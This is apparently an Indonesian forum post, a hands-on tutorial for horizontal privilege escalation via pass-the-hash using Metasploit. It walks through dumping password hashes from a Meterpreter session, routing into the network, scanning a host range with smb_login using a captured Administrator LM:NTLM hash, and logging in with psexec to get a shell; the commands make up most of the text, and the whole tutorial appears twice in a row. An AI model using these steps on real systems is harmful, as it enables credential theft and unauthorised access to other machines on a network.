06-26-2016, 04:02 AM
Horizontal privilege escalation adalah tahap ketika kita ingin mendapatkan hak akses yang tingkatnya sama alangkah untuk mengakses suatu yang kita tidak dapat akses. Biasanya Horizontal Privilege Escalation menyerang komputer berbeda dalam 1 network, untuk bypass Firewall, atau mendapatkan akses yang hanya suatu komputer bisa akses.
Kali ini saya akan menggunakan Exploit yang bernama Pass the Hash (sering disingkat PTH) untuk melakukan Horizontal Privilege Escalation. Sebelumnya supaya gak jadi Script Kiddies saya akan jelaskan cara Pass the Hash Attack bekerja,
pada dasarnya pass the hash bagus dikarenakan kita login dengan hash nya, (hash LanMan) pada dasarnya Pass the Hash bisa dilakukan untuk seluruh server yang mengizinkan LM atau NTLM Autentikasi
Mari langsung bahas aja ya :)
oke ketika kau sudah punya Meterpreter session masukan "hashdump"
perintah ini akan memberi username dan juga hash password dari username yang kita leak
kemudian masukan "shell" terus "ipconfig" untuk memperlihatkan IP
liat sesi background kita dengan memasukan perintah "background"
kemudian masukan "route add (ip korban) (ip proxy mu)"
kemudian kita cari apakah ada yang pakek password ynag sama di network dengan perintah
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.10.10.101-120
set SMBUser Administrator
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b
set verbose false
run
yang diatas tidak akan melogin hanya mencari sebuah device yang hashdumpnya sama, untuk login masukan perintah ini
use windows/smb/psexec
set SMBUser Administrator
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b
set RHOST 10.10.10.103
exploit
kemudian untuk membuktikan masukan
shell
ipconfig
selesai
Kali ini saya akan menggunakan Exploit yang bernama Pass the Hash (sering disingkat PTH) untuk melakukan Horizontal Privilege Escalation. Sebelumnya supaya gak jadi Script Kiddies saya akan jelaskan cara Pass the Hash Attack bekerja,
pada dasarnya pass the hash bagus dikarenakan kita login dengan hash nya, (hash LanMan) pada dasarnya Pass the Hash bisa dilakukan untuk seluruh server yang mengizinkan LM atau NTLM Autentikasi
Mari langsung bahas aja ya :)
oke ketika kau sudah punya Meterpreter session masukan "hashdump"
perintah ini akan memberi username dan juga hash password dari username yang kita leak
kemudian masukan "shell" terus "ipconfig" untuk memperlihatkan IP
liat sesi background kita dengan memasukan perintah "background"
kemudian masukan "route add (ip korban) (ip proxy mu)"
kemudian kita cari apakah ada yang pakek password ynag sama di network dengan perintah
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.10.10.101-120
set SMBUser Administrator
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b
set verbose false
run
yang diatas tidak akan melogin hanya mencari sebuah device yang hashdumpnya sama, untuk login masukan perintah ini
use windows/smb/psexec
set SMBUser Administrator
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b
set RHOST 10.10.10.103
exploit
kemudian untuk membuktikan masukan
shell
ipconfig
selesai